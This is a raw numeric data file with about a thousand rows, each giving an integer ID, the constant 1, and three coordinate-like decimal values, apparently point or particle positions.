6 1 0.709295 0.0927013 0.229585
406 1 0.952054 0.0311431 0.196775
237 1 0.590319 0.0532375 0.171873
533 1 0.703228 0.0757332 0.199807
555 1 0.96562 0.119711 0.227727
1264 1 0.510242 0.199368 0.184096
2030 1 0.843239 0.0904281 0.173712
1564 1 0.555468 0.33218 0.2425
1627 1 0.588046 0.490732 0.208307
997 1 0.74235 0.823646 0.221932
1720 1 0.725406 0.847662 0.212071
376 1 0.584882 0.863784 0.185908
1242 1 0.601744 0.998001 0.174396
1375 1 0.505399 0.0653035 0.273609
1995 1 0.834657 0.0401129 0.2464
1106 1 0.934276 0.094092 0.311613
49 1 0.935224 0.326173 0.490634
127 1 0.775656 0.377789 0.249838
1884 1 0.936783 0.62256 0.415303
1313 1 0.636231 0.387252 0.224448
5 1 0.76153 0.412158 0.270558
1261 1 0.965167 0.414189 0.253829
1385 1 0.819877 0.527666 0.25326
1353 1 0.783108 0.671241 0.243656
101 1 0.893829 0.652246 0.182358
297 1 0.901062 0.620693 0.167484
602 1 0.842891 0.6599 0.260406
1812 1 0.74468 0.764885 0.242224
960 1 0.567361 0.769957 0.214253
1914 1 0.577274 0.831691 0.194485
1831 1 0.924655 0.807991 0.278486
574 1 0.846566 0.0418445 0.284475
154 1 0.986776 0.198144 0.255635
611 1 0.755632 0.315389 0.203423
1501 1 0.552918 0.303429 0.226888
1978 1 0.774574 0.33365 0.189076
1396 1 0.535475 0.660746 0.00775132
1825 1 0.761365 0.428075 0.238845
26 1 0.864036 0.486635 0.207501
1191 1 0.733561 0.528363 0.255059
1765 1 0.570544 0.637297 0.272536
778 1 0.68041 0.67265 0.238165
2023 1 0.885999 0.770416 0.172607
1195 1 0.939884 0.796607 0.294353
214 1 0.898684 0.808855 0.283725
1478 1 0.881732 0.900437 0.228742
1932 1 0.717476 0.934794 0.244702
1325 1 0.709661 0.950158 0.192021
163 1 0.784518 0.207054 0.301586
241 1 0.716544 0.244724 0.268582
150 1 0.760127 0.327375 0.314861
1582 1 0.824052 0.375328 0.266244
91 1 0.756199 0.412541 0.210881
1725 1 0.629566 0.516095 0.279363
479 1 0.666444 0.456482 0.254892
1775 1 0.615064 0.503242 0.246344
1556 1 0.551034 0.589971 0.19685
308 1 0.79597 0.505545 0.227801
263 1 0.938853 0.592175 0.251067
1305 1 0.645995 0.705852 0.239307
59 1 0.632303 0.762305 0.239164
1856 1 0.857108 0.730812 0.254583
390 1 0.898602 0.841587 0.315492
2009 1 0.528459 0.885353 0.309699
662 1 0.714585 0.898455 0.254962
460 1 0.810425 0.903057 0.211718
1498 1 0.905507 0.884131 0.248818
760 1 0.707914 0.0187676 0.243721
424 1 0.923888 0.0202751 0.276234
1158 1 0.9253 0.0332752 0.256148
1689 1 0.595117 0.059764 0.239473
456 1 0.805687 0.236369 0.286362
1850 1 0.844693 0.201721 0.246378
883 1 0.684548 0.234379 0.233243
691 1 0.641256 0.362519 0.288217
1999 1 0.740825 0.425857 0.2499
1889 1 0.899099 0.295759 0.283425
1432 1 0.530574 0.425094 0.272526
1525 1 0.609082 0.322625 0.315872
1311 1 0.693208 0.400072 0.297631
421 1 0.683934 0.372407 0.229123
140 1 0.737922 0.379538 0.312663
980 1 0.688219 0.558272 0.286852
1337 1 0.553687 0.583327 0.312082
1333 1 0.818126 0.666228 0.274157
755 1 0.956928 0.640062 0.232865
1852 1 0.71501 0.735859 0.321596
1151 1 0.815471 0.786382 0.307543
1229 1 0.620075 0.890117 0.240836
366 1 0.697251 0.943297 0.291203
20 1 0.7814 0.982101 0.247112
39 1 0.553678 0.0960985 0.358217
759 1 0.672984 0.125679 0.313796
291 1 0.729596 0.115349 0.287697
93 1 0.808958 0.173775 0.264073
1286 1 0.88155 0.208546 0.247587
476 1 0.637704 0.281239 0.256779
1285 1 0.543368 0.369432 0.028111
616 1 0.94543 0.361768 0.288057
1521 1 0.854087 0.426428 0.310713
707 1 0.711042 0.522913 0.356982
481 1 0.707879 0.567166 0.289377
1449 1 0.53549 0.658108 0.325287
1878 1 0.927496 0.646797 0.263252
1657 1 0.757078 0.649373 0.217291
370 1 0.582797 0.758401 0.287412
715 1 0.955266 0.749079 0.322421
175 1 0.758151 0.801599 0.219238
235 1 0.730663 0.855188 0.35034
1502 1 0.733695 0.861018 0.260496
1758 1 0.923628 0.93239 0.312422
289 1 0.756782 0.515349 0.0281975
832 1 0.512174 0.974743 0.289445
1993 1 0.652694 0.965069 0.229538
392 1 0.536801 0.0286337 0.255945
1461 1 0.718304 0.0400988 0.3671
69 1 0.518461 0.451058 0.0103074
1450 1 0.508839 0.609248 0.399456
1020 1 0.685698 0.189969 0.306205
387 1 0.742776 0.216953 0.290705
560 1 0.912177 0.302615 0.343125
813 1 0.981045 0.444419 0.153899
1297 1 0.828916 0.422227 0.2977
1238 1 0.606827 0.375784 0.283464
1744 1 0.521244 0.466292 0.299754
1712 1 0.876606 0.501039 0.324113
369 1 0.969283 0.544508 0.344298
396 1 0.829473 0.643685 0.31576
160 1 0.737621 0.676842 0.333948
321 1 0.811873 0.668143 0.337189
1080 1 0.913026 0.900871 0.350268
189 1 0.636773 0.175271 0.35249
722 1 0.600782 0.139904 0.275535
1810 1 0.762259 0.190414 0.335894
1987 1 0.578358 0.24029 0.314411
1663 1 0.742819 0.26598 0.327571
637 1 0.827709 0.276371 0.33069
634 1 0.933269 0.287042 0.313357
1682 1 0.975837 0.493948 0.470996
1971 1 0.879279 0.396446 0.28485
1197 1 0.854979 0.443371 0.354439
254 1 0.713553 0.47093 0.341392
287 1 0.991059 0.460574 0.408193
1815 1 0.81976 0.510946 0.291493
34 1 0.876841 0.405027 0.356058
1594 1 0.946924 0.4301 0.332295
243 1 0.795628 0.573559 0.371575
825 1 0.574017 0.544154 0.328328
1245 1 0.813877 0.63648 0.373417
362 1 0.882376 0.600988 0.301286
1101 1 0.842684 0.754278 0.319529
356 1 0.62841 0.684568 0.272681
1347 1 0.753389 0.947964 0.227536
1148 1 0.615929 0.975867 0.269768
985 1 0.664528 0.987689 0.382997
488 1 0.734579 0.0926505 0.209779
1212 1 0.571009 0.0275047 0.391185
496 1 0.888131 0.205186 0.281586
1067 1 0.883783 0.30152 0.32541
1824 1 0.863823 0.249269 0.339946
1476 1 0.642547 0.302734 0.352129
302 1 0.827353 0.362532 0.387848
1442 1 0.842809 0.431765 0.370012
1766 1 0.811201 0.40876 0.364548
1077 1 0.930249 0.508971 0.351102
658 1 0.845558 0.55224 0.369673
1234 1 0.702081 0.505071 0.377066
1339 1 0.651061 0.621849 0.397568
1718 1 0.55937 0.665582 0.343353
826 1 0.715589 0.775554 0.375849
774 1 0.903083 0.784094 0.317999
1348 1 0.930078 0.0326537 0.379176
2 1 0.801699 0.85731 0.397953
256 1 0.681106 0.922305 0.386611
1531 1 0.660355 0.100256 0.392706
1392 1 0.947479 0.17149 0.336737
323 1 0.996982 0.102801 0.378203
893 1 0.882966 0.114825 0.314679
1618 1 0.806538 0.296979 0.360583
993 1 0.62661 0.415403 0.389053
217 1 0.752192 0.392367 0.363244
1292 1 0.90969 0.423813 0.33949
1218 1 0.63875 0.588688 0.404266
472 1 0.576957 0.702607 0.430014
1595 1 0.635296 0.696898 0.325305
184 1 0.878602 0.639476 0.376154
1851 1 0.915236 0.695327 0.394865
785 1 0.888887 0.757085 0.381773
129 1 0.860976 0.778924 0.00993794
1161 1 0.619648 0.778149 0.365052
938 1 0.877202 0.749461 0.363555
1953 1 0.665238 0.795879 0.348347
1110 1 0.944206 0.762949 0.348008
967 1 0.741622 0.843357 0.364318
619 1 0.916356 0.979851 0.399277
1354 1 0.910664 0.946925 0.369204
1896 1 0.696557 0.974672 0.41373
1228 1 0.958069 0.955941 0.360015
1869 1 0.71362 0.342207 0.495877
1913 1 0.630292 0.213611 0.420609
1321 1 0.804841 0.191484 0.349063
822 1 0.804169 0.318907 0.334506
51 1 0.896599 0.446505 0.409947
651 1 0.679266 0.556146 0.437931
1322 1 0.517888 0.578423 0.368003
259 1 0.591297 0.506647 0.354232
1647 1 0.862995 0.60251 0.327529
86 1 0.903917 0.658806 0.406712
1514 1 0.726346 0.703599 0.437732
161 1 0.954827 0.946132 0.362274
1220 1 0.906188 0.130489 0.426158
930 1 0.615819 0.277883 0.41339
1819 1 0.524343 0.350174 0.378847
417 1 0.874994 0.276435 0.414281
1899 1 0.755062 0.337344 0.421685
1922 1 0.79084 0.334498 0.4496
1551 1 0.988362 0.613563 0.366449
149 1 0.947 0.367447 0.394349
626 1 0.909797 0.484162 0.460736
277 1 0.732283 0.481739 0.38933
482 1 0.796592 0.519678 0.345696
332 1 0.987305 0.611352 0.458446
671 1 0.617304 0.66206 0.359544
236 1 0.590599 0.703537 0.429446
1472 1 0.987241 0.69695 0.419953
1893 1 0.781213 0.79595 0.387414
347 1 0.551886 0.908418 0.0616304
1664 1 0.956496 0.945412 0.40235
1411 1 0.605993 0.89347 0.440527
1536 1 0.51003 0.0603461 0.404457
928 1 0.714329 0.115304 0.442593
562 1 0.666712 0.0929282 0.429068
1467 1 0.79509 0.300987 0.482834
708 1 0.718433 0.179594 0.435679
984 1 0.917389 0.138065 0.416537
2002 1 0.661851 0.226308 0.439288
1951 1 0.920877 0.296289 0.408189
1384 1 0.839502 0.357139 0.395484
1842 1 0.842297 0.431642 0.441424
1580 1 0.805801 0.513074 0.419203
13 1 0.592548 0.580932 0.407916
1741 1 0.707358 0.58905 0.417935
1571 1 0.725277 0.526647 0.45804
713 1 0.579052 0.660977 0.493987
169 1 0.791619 0.72208 0.454248
1083 1 0.938803 0.803833 0.444814
1740 1 0.989603 0.0950404 0.421453
537 1 0.541338 0.899141 0.356814
116 1 0.709613 0.88747 0.450611
498 1 0.829221 0.879595 0.347917
216 1 0.6412 0.00602426 0.425159
379 1 0.728717 0.94134 0.405956
1035 1 0.678331 0.0748426 0.423351
675 1 0.834935 0.997024 0.417876
1786 1 0.547597 0.124985 0.411963
1046 1 0.877327 0.25374 0.471195
511 1 0.773696 0.342735 0.475196
807 1 0.702625 0.390208 0.437392
422 1 0.837711 0.486346 0.387383
2028 1 0.888759 0.498789 0.482394
526 1 0.506456 0.997529 0.387282
100 1 0.906912 0.601115 0.435475
790 1 0.749485 0.643506 0.404971
122 1 0.7612 0.764844 0.438048
889 1 0.719899 0.928808 0.479887
977 1 0.960173 0.91051 0.437177
583 1 0.897811 0.0354358 0.45959
1204 1 0.861142 0.939095 0.42863
1592 1 0.636923 0.0629669 0.477546
1570 1 0.588992 0.130043 0.430987
1776 1 0.647772 0.230231 0.469252
1039 1 0.840109 0.603677 0.362749
548 1 0.776025 0.884196 0.450465
754 1 0.80715 0.315752 0.418451
433 1 0.548875 0.481826 0.399336
1173 1 0.97598 0.800303 0.39855
1733 1 0.503853 0.908084 0.203614
2017 1 0.798729 0.595193 0.476311
1249 1 0.93398 0.665867 0.414322
1853 1 0.702245 0.692592 0.438825
688 1 0.829004 0.702185 0.470264
1029 1 0.891086 0.73897 0.437763
244 1 0.861968 0.800256 0.488151
1424 1 0.824789 0.751852 0.471271
1058 1 0.58604 0.796646 0.432243
1855 1 0.923308 0.8873 0.472803
1098 1 0.721983 0.0251253 0.43559
87 1 0.855508 0.981998 0.46805
507 1 0.974345 0.692578 0.424629
1867 1 0.801256 0.115294 0.486348
1154 1 0.971244 0.996448 0.224404
782 1 0.784651 0.0906566 0.471183
1015 1 0.880817 0.161174 0.443648
2015 1 0.925735 0.0970969 0.498304
1645 1 0.55429 0.403729 0.493359
1904 1 0.517243 0.175749 0.040958
1050 1 0.961507 0.236257 0.465498
763 1 0.750683 0.423077 0.497258
1714 1 0.90104 0.906109 0.478766
1187 1 0.543001 0.677638 0.489754
1768 1 0.626073 0.664118 0.422617
266 1 0.948593 0.633349 0.450472
867 1 0.610396 0.688707 0.41677
352 1 0.937112 0.73898 0.46608
1065 1 0.522837 0.872279 0.0173061
1544 1 0.972866 0.232593 0.35384
1072 1 0.985163 0.808204 0.134191
1587 1 0.896636 0.00697165 0.511361
1578 1 0.800142 0.0234256 0.532073
1699 1 0.814104 0.145462 0.534231
446 1 0.7091 0.334146 0.518465
896 1 0.889533 0.336486 0.538513
601 1 0.741109 0.403816 0.520499
1986 1 0.536671 0.751299 0.92386
571 1 0.977426 0.525129 0.761486
764 1 0.971134 0.828992 0.940244
444 1 0.576583 0.660213 0.510719
71 1 0.787875 0.0263171 0.584316
982 1 0.524173 0.436864 0.845327
1543 1 0.949569 0.0652261 0.540216
394 1 0.506337 0.860529 0.65406
1634 1 0.694397 0.174484 0.550745
1797 1 0.799376 0.325702 0.992837
1877 1 0.825242 0.589499 0.56331
1111 1 0.84865 0.550624 0.541786
987 1 0.63473 0.539693 0.505316
1708 1 0.833948 0.566675 0.517066
1703 1 0.806308 0.827993 0.531222
1704 1 0.620748 0.860291 0.520144
398 1 0.514128 0.0565852 0.545562
1540 1 0.867865 0.958971 0.508165
693 1 0.69925 0.0627169 0.50839
969 1 0.958535 0.0364286 0.521064
1019 1 0.653381 0.052965 0.590679
1400 1 0.963912 0.0681558 0.587891
1839 1 0.969374 0.166541 0.556837
1881 1 0.698498 0.202392 0.512513
612 1 0.882461 0.21719 0.582159
1859 1 0.554314 0.276767 0.549482
1694 1 0.877569 0.219809 0.574947
17 1 0.761288 0.277815 0.564909
1379 1 0.501396 0.73368 0.808214
641 1 0.852496 0.456422 0.611471
1340 1 0.879051 0.560207 0.531263
1460 1 0.700278 0.560636 0.543724
242 1 0.575407 0.678019 0.555412
315 1 0.860496 0.695528 0.520405
218 1 0.985679 0.723757 0.575467
1947 1 0.50097 0.145446 0.84429
494 1 0.555951 0.867858 0.572687
1386 1 0.984194 0.222322 0.579863
493 1 0.807406 0.842456 0.588585
293 1 0.868169 0.161347 0.530307
112 1 0.861501 0.152317 0.556695
1471 1 0.70161 0.188418 0.515638
63 1 0.647345 0.579481 0.991468
1702 1 0.749685 0.513385 0.514141
298 1 0.918573 0.253575 0.546418
1342 1 0.866755 0.389921 0.546661
1753 1 0.643724 0.396996 0.513186
1915 1 0.752362 0.368113 0.611798
913 1 0.66209 0.630608 0.560577
514 1 0.780623 0.560415 0.572489
1434 1 0.929761 0.550291 0.550842
546 1 0.793206 0.624318 0.546835
2036 1 0.825584 0.619786 0.565963
199 1 0.871954 0.715463 0.558221
520 1 0.928714 0.761069 0.507238
901 1 0.613606 0.898051 0.593222
1781 1 0.706214 0.959869 0.508238
1057 1 0.72349 0.0882146 0.644121
132 1 0.547504 0.16506 0.539686
1926 1 0.860795 0.158022 0.524568
1554 1 0.683847 0.367501 0.587765
1608 1 0.790019 0.38285 0.60197
1132 1 0.784592 0.568025 0.640008
577 1 0.715384 0.571591 0.572203
653 1 0.907623 0.566821 0.555178
1519 1 0.612968 0.567379 0.609982
382 1 0.637799 0.63757 0.601826
657 1 0.711398 0.649587 0.555077
842 1 0.545022 0.756417 0.534364
1726 1 0.520464 0.588066 0.899583
1441 1 0.895982 0.777866 0.562018
1420 1 0.792461 0.902841 0.552812
1549 1 0.553685 0.97334 0.56448
300 1 0.849079 0.992719 0.627513
1616 1 0.866066 0.980339 0.990952
1924 1 0.653809 0.188382 0.957378
808 1 0.726516 0.098248 0.649003
664 1 0.943395 0.641661 0.565182
752 1 0.683457 0.127031 0.628459
501 1 0.669605 0.146917 0.630343
1672 1 0.636022 0.564488 0.936214
219 1 0.671571 0.244271 0.561108
1605 1 0.872031 0.314118 0.625014
854 1 0.970702 0.364532 0.601223
1126 1 0.614142 0.407351 0.62006
1636 1 0.929942 0.362594 0.626147
1843 1 0.769042 0.468969 0.574689
146 1 0.737814 0.56165 0.614271
1153 1 0.733302 0.482468 0.609798
789 1 0.754163 0.555394 0.642873
1033 1 0.855942 0.696279 0.573754
780 1 0.693064 0.724063 0.590384
932 1 0.873214 0.761955 0.557433
1174 1 0.569363 0.75046 0.550649
428 1 0.640825 0.82803 0.550945
787 1 0.758695 0.899318 0.621719
741 1 0.831406 0.899045 0.614238
966 1 0.749166 0.0449118 0.624187
796 1 0.780529 0.0451076 0.667584
1909 1 0.942663 0.102593 0.57144
495 1 0.837264 0.127374 0.651604
521 1 0.673714 0.153248 0.603761
1118 1 0.503303 0.172502 0.639522
931 1 0.970055 0.288268 0.591214
678 1 0.805905 0.317958 0.606636
1298 1 0.904918 0.346259 0.635674
1021 1 0.938274 0.363649 0.535329
1617 1 0.903851 0.425179 0.645047
1522 1 0.556962 0.428054 0.601353
435 1 0.739246 0.47625 0.623798
426 1 0.730442 0.467821 0.621152
885 1 0.724802 0.541771 0.631723
1236 1 0.551445 0.60916 0.590737
1346 1 0.875449 0.614023 0.612732
98 1 0.8935 0.695805 0.611095
649 1 0.621431 0.688537 0.63318
892 1 0.695096 0.0778201 0.640514
2046 1 0.872194 0.0515215 0.623605
1023 1 0.831122 0.161074 0.641344
401 1 0.510383 0.136305 0.576063
656 1 0.824247 0.145852 0.669465
309 1 0.761534 0.248157 0.624666
644 1 0.897365 0.348062 0.629798
375 1 0.59335 0.401234 0.597349
1100 1 0.665452 0.40894 0.619242
432 1 0.685628 0.498373 0.689221
1125 1 0.57768 0.485207 0.622723
1821 1 0.713602 0.527169 0.589807
1508 1 0.687473 0.574959 0.635659
29 1 0.889874 0.635273 0.631014
1997 1 0.790389 0.603915 0.626269
314 1 0.546925 0.675539 0.586489
1661 1 0.870072 0.858506 0.645399
817 1 0.871036 0.827194 0.552353
1047 1 0.850722 0.837668 0.678055
573 1 0.589076 0.90379 0.674062
1910 1 0.68852 0.952295 0.61883
280 1 0.634218 0.00409895 0.675647
1032 1 0.571164 0.0887489 0.656752
762 1 0.521968 0.516918 0.674188
1208 1 0.996518 0.600753 0.802157
1492 1 0.618015 0.142648 0.611212
1539 1 0.566659 0.165277 0.632308
1317 1 0.777488 0.188019 0.65733
1114 1 0.523066 0.152566 0.649646
1217 1 0.889719 0.113599 0.669419
313 1 0.812513 0.238762 0.631413
673 1 0.729469 0.221876 0.671087
155 1 0.867679 0.265904 0.647626
1806 1 0.50181 0.325577 0.682369
1936 1 0.712948 0.308371 0.621205
2006 1 0.889546 0.429947 0.7148
878 1 0.828094 0.560327 0.620169
2026 1 0.733323 0.534705 0.636734
1497 1 0.992339 0.609594 0.697021
1300 1 0.911843 0.743602 0.633592
1528 1 0.702779 0.769626 0.599483
1658 1 0.750769 0.795539 0.682778
1660 1 0.804794 0.866703 0.625759
584 1 0.887494 0.784089 0.658199
919 1 0.916051 0.892287 0.715145
1312 1 0.581625 0.899553 0.680195
1221 1 0.62401 0.920825 0.604493
719 1 0.713861 0.950352 0.64858
1296 1 0.618095 0.942529 0.662705
229 1 0.635427 0.944694 0.634962
788 1 0.537314 0.0129435 0.678481
809 1 0.9636 0.991348 0.691522
781 1 0.915685 0.216727 0.681431
1244 1 0.510073 0.314272 0.721126
862 1 0.76097 0.27462 0.748627
683 1 0.966694 0.257141 0.666599
1107 1 0.673813 0.429366 0.711361
1310 1 0.694541 0.492745 0.676958
922 1 0.810175 0.63099 0.674041
1715 1 0.875437 0.666769 0.612724
1793 1 0.975016 0.70393 0.619307
544 1 0.737239 0.0720149 0.568575
81 1 0.734905 0.748838 0.688449
1314 1 0.922818 0.87896 0.699045
845 1 0.997288 0.0810783 0.682874
1861 1 0.734544 0.0165424 0.673736
907 1 0.75432 0.0956744 0.688786
1888 1 0.740381 0.223868 0.644809
1882 1 0.910338 0.350109 0.729092
1728 1 0.792286 0.356548 0.703693
1747 1 0.782362 0.211814 0.534438
1397 1 0.657045 0.505376 0.732828
948 1 0.889781 0.522019 0.67607
88 1 0.945604 0.621897 0.63355
1473 1 0.618938 0.711637 0.717189
606 1 0.990763 0.803218 0.683974
1513 1 0.930423 0.82622 0.607175
1526 1 0.586886 0.791 0.615581
205 1 0.573255 0.825856 0.6981
1176 1 0.83539 0.809589 0.677056
2027 1 0.521492 0.975945 0.708734
408 1 0.934349 0.947722 0.639744
1491 1 0.547686 0.0550814 0.745265
706 1 0.631125 0.0561219 0.70289
920 1 0.962975 0.067466 0.694095
821 1 0.567863 0.100069 0.670067
1648 1 0.797923 0.106108 0.729087
1137 1 0.546259 0.183698 0.741898
1358 1 0.676806 0.871694 0.931118
908 1 0.589078 0.172592 0.686961
1293 1 0.648849 0.243554 0.721595
35 1 0.624387 0.304782 0.687859
1315 1 0.764897 0.343605 0.7191
46 1 0.928442 0.391491 0.743343
1515 1 0.916517 0.427503 0.681429
1955 1 0.849012 0.536078 0.64509
738 1 0.954228 0.619341 0.725651
667 1 0.76226 0.725689 0.724865
239 1 0.575596 0.840934 0.688989
951 1 0.815343 0.957159 0.734506
79 1 0.935169 0.927298 0.666531
61 1 0.759686 0.957233 0.665359
1911 1 0.764074 0.137053 0.735165
650 1 0.852287 0.253252 0.739632
962 1 0.874253 0.29421 0.715076
1771 1 0.694244 0.27021 0.686047
1115 1 0.552135 0.35907 0.739375
1431 1 0.662825 0.326457 0.746592
32 1 0.817858 0.388571 0.649547
255 1 0.666525 0.50104 0.725461
1071 1 0.931726 0.473013 0.731763
1216 1 0.626735 0.570134 0.70441
766 1 0.620689 0.562714 0.695726
1939 1 0.882481 0.5433 0.762548
1226 1 0.854403 0.654982 0.733167
1352 1 0.889654 0.59992 0.765122
1030 1 0.589407 0.730246 0.715228
1964 1 0.693332 0.794724 0.726608
1783 1 0.594693 0.823958 0.756287
618 1 0.868206 0.908014 0.727599
968 1 0.757103 0.0808754 0.691914
135 1 0.594939 0.0257477 0.686217
1040 1 0.681716 0.0107344 0.757706
1398 1 0.596069 0.123462 0.739669
795 1 0.599201 0.118947 0.723189
1698 1 0.79797 0.18125 0.741931
1674 1 0.816357 0.145005 0.73983
1524 1 0.538204 0.252523 0.724987
1767 1 0.925101 0.252241 0.692144
206 1 0.818102 0.288035 0.70843
195 1 0.946583 0.322288 0.725634
1179 1 0.937919 0.219317 0.744493
1834 1 0.7758 0.515255 0.751401
1945 1 0.589058 0.465815 0.788097
587 1 0.853435 0.553823 0.751794
273 1 0.62862 0.615271 0.77797
1160 1 0.780963 0.681806 0.771228
1270 1 0.995872 0.654179 0.715429
1196 1 0.727895 0.787967 0.727778
450 1 0.657033 0.736324 0.642864
198 1 0.805189 0.871168 0.739
264 1 0.665006 0.795365 0.696809
359 1 0.606942 0.826871 0.693261
1119 1 0.745748 0.886567 0.724662
1394 1 0.544546 0.888377 0.743368
1717 1 0.835 0.0516107 0.757805
438 1 0.940646 0.167569 0.691399
427 1 0.990796 0.148424 0.753896
564 1 0.565257 0.243893 0.751472
1754 1 0.757785 0.484357 0.527341
1143 1 0.893081 0.276858 0.799106
418 1 0.614771 0.343919 0.763707
292 1 0.993175 0.522042 0.712129
1537 1 0.880965 0.567541 0.753198
1000 1 0.784397 0.553303 0.801177
139 1 0.617639 0.656657 0.774638
549 1 0.746763 0.719408 0.73641
1505 1 0.590482 0.698953 0.771212
814 1 0.693222 0.727684 0.785985
858 1 0.85043 0.662799 0.72901
1063 1 0.931223 0.693409 0.762989
1716 1 0.520352 0.281739 0.990454
1789 1 0.639555 0.814837 0.80004
1265 1 0.613714 0.787872 0.719654
1624 1 0.52088 0.888913 0.766024
1929 1 0.924483 0.976384 0.741031
391 1 0.770454 0.0451567 0.828768
317 1 0.868715 0.0718064 0.726058
66 1 0.563073 0.0620149 0.806663
596 1 0.727977 0.0590817 0.776188
228 1 0.941941 0.122389 0.762964
727 1 0.962267 0.0909027 0.770371
1656 1 0.794855 0.386045 0.798341
1316 1 0.595487 0.403301 0.770702
1742 1 0.679338 0.410785 0.739833
1942 1 0.782747 0.529599 0.791484
240 1 0.544215 0.651732 0.753094
1568 1 0.709517 0.587869 0.704703
103 1 0.676818 0.685579 0.772104
1980 1 0.827057 0.649964 0.792733
582 1 0.825757 0.76246 0.754928
1001 1 0.531236 0.770404 0.735935
119 1 0.563683 0.582337 0.918982
8 1 0.962823 0.1395 0.8065
114 1 0.622362 0.22266 0.786796
1263 1 0.520281 0.297822 0.807127
1108 1 0.572884 0.2696 0.800447
1829 1 0.954126 0.222951 0.742139
561 1 0.676452 0.275316 0.771928
729 1 0.868828 0.442417 0.757683
1589 1 0.976879 0.51482 0.536588
1140 1 0.945321 0.51754 0.774861
1854 1 0.686305 0.545552 0.799955
841 1 0.885077 0.641435 0.827737
486 1 0.677977 0.664539 0.778627
268 1 0.509515 0.695702 0.797444
1182 1 0.869058 0.727222 0.811796
568 1 0.653203 0.057602 0.534148
1830 1 0.627065 0.779662 0.806982
1162 1 0.527513 0.891222 0.828651
1719 1 0.533405 0.834455 0.755818
1219 1 0.745289 0.939475 0.796829
1602 1 0.707848 0.117627 0.803259
665 1 0.64328 0.128743 0.820938
1575 1 0.644582 0.234435 0.77264
305 1 0.764948 0.131905 0.800594
1344 1 0.558026 0.247429 0.84859
180 1 0.813077 0.139377 0.842521
1395 1 0.515838 0.255635 0.866461
939 1 0.948355 0.230975 0.796226
1606 1 0.802416 0.444237 0.765633
628 1 0.752582 0.424361 0.804845
986 1 0.753252 0.587354 0.819778
1483 1 0.82072 0.153101 0.522579
1967 1 0.620952 0.645007 0.792478
949 1 0.659212 0.676975 0.793914
1207 1 0.552897 0.773056 0.849893
1662 1 0.835006 0.894934 0.797844
1574 1 0.671703 0.0479921 0.874915
1022 1 0.721233 0.0803976 0.90589
320 1 0.660303 0.16754 0.827201
319 1 0.65007 0.214288 0.812759
1282 1 0.601041 0.246968 0.82271
770 1 0.777677 0.270565 0.822529
173 1 0.609994 0.312836 0.866715
23 1 0.911313 0.431571 0.866649
1053 1 0.666355 0.501054 0.828224
67 1 0.947996 0.574677 0.791375
1136 1 0.998648 0.551542 0.795104
700 1 0.745986 0.545448 0.822688
975 1 0.89019 0.514375 0.851312
676 1 0.784426 0.5317 0.815478
1808 1 0.640409 0.585391 0.800445
404 1 0.990802 0.0549665 0.504097
1873 1 0.531403 0.643218 0.677914
202 1 0.574158 0.925963 0.853252
1147 1 0.661157 0.876267 0.76861
1916 1 0.831277 0.0559096 0.854766
151 1 0.516486 0.0708936 0.863624
630 1 0.952213 0.0830834 0.78777
18 1 0.744285 0.14964 0.776234
565 1 0.651539 0.12487 0.872208
607 1 0.55897 0.241951 0.777335
1974 1 0.677558 0.206183 0.860939
73 1 0.602562 0.230343 0.847867
251 1 0.945689 0.330218 0.821254
170 1 0.892234 0.454047 0.881913
1105 1 0.636051 0.5611 0.826167
397 1 0.573141 0.68159 0.866409
209 1 0.533229 0.706786 0.827881
232 1 0.773914 0.866571 0.839007
60 1 0.586091 0.951832 0.825832
1782 1 0.802018 0.918458 0.887459
1743 1 0.987151 0.933847 0.803285
1944 1 0.810887 0.130692 0.908927
1941 1 0.889685 0.0319245 0.771118
1546 1 0.969684 0.143778 0.865739
1541 1 0.510516 0.241026 0.885822
1165 1 0.524682 0.244261 0.851299
1350 1 0.96861 0.234668 0.869523
773 1 0.726817 0.401119 0.863744
1076 1 0.594698 0.593835 0.857389
2005 1 0.763391 0.855088 0.987759
848 1 0.800839 0.62266 0.818047
1038 1 0.504289 0.618449 0.858369
1680 1 0.687064 0.690797 0.902382
245 1 0.837617 0.778079 0.770522
1381 1 0.731009 0.742975 0.915454
142 1 0.673522 0.807165 0.866608
1487 1 0.87643 0.92182 0.872337
502 1 0.905288 0.031624 0.91125
1550 1 0.71701 0.0744649 0.880532
1596 1 0.807038 0.207257 0.86496
1590 1 0.795652 0.182581 0.866261
1422 1 0.902558 0.223263 0.876488
405 1 0.582033 0.234813 0.880245
1700 1 0.914382 0.267909 0.888604
1479 1 0.891733 0.227093 0.965621
2018 1 0.905986 0.287123 0.884084
306 1 0.760997 0.330991 0.882609
1984 1 0.878504 0.303534 0.92606
1306 1 0.646276 0.478328 0.925419
1391 1 0.958093 0.407206 0.902618
357 1 0.581713 0.391619 0.805801
703 1 0.574133 0.536349 0.92811
1547 1 0.651836 0.525595 0.830795
492 1 0.652885 0.556186 0.919135
22 1 0.742619 0.548216 0.959628
1194 1 0.940306 0.772734 0.867849
21 1 0.69155 0.833948 0.885087
11 1 0.728997 0.914222 0.95154
603 1 0.758855 0.88109 0.871605
1649 1 0.98068 0.852228 0.852147
1172 1 0.990291 0.967307 0.928801
768 1 0.920327 0.911034 0.89713
1628 1 0.624486 0.978583 0.857453
585 1 0.984328 0.0817576 0.958223
1007 1 0.614372 0.111055 0.902646
1975 1 0.664748 0.226747 0.906817
1201 1 0.778264 0.247005 0.97486
1343 1 0.613945 0.259422 0.880461
1906 1 0.71771 0.311955 0.924057
1150 1 0.634368 0.339378 0.893955
158 1 0.703063 0.303776 0.837592
1527 1 0.600684 0.369772 0.868407
1918 1 0.709285 0.440186 0.939403
340 1 0.532564 0.454517 0.528554
925 1 0.676134 0.402566 0.94711
1416 1 0.67506 0.478914 0.981797
1601 1 0.944783 0.531387 0.850385
1504 1 0.691467 0.263872 0.981528
108 1 0.609437 0.567747 0.970404
1678 1 0.843488 0.51142 0.865005
1103 1 0.674542 0.800863 0.890069
1960 1 0.620137 0.818178 0.878693
1404 1 0.517453 0.45558 0.888273
743 1 0.599724 0.812825 0.973228
800 1 0.907972 0.954765 0.900077
1223 1 0.575951 0.624102 0.83259
12 1 0.644726 0.979554 0.977257
1304 1 0.615011 0.118626 0.975825
1260 1 0.664698 0.122859 0.829224
1415 1 0.639956 0.215639 0.907977
1439 1 0.695746 0.262165 0.892071
1129 1 0.848699 0.271958 0.901929
926 1 0.922775 0.447415 0.947135
1735 1 0.98311 0.444009 0.975046
1872 1 0.900462 0.501493 0.897579
685 1 0.905033 0.524133 0.862964
509 1 0.594448 0.647053 0.92713
430 1 0.730495 0.696288 0.987789
1510 1 0.9368 0.832487 0.923203
420 1 0.723106 0.0761159 0.958462
1799 1 0.678268 0.0657934 0.945712
1364 1 0.524466 0.929549 0.538999
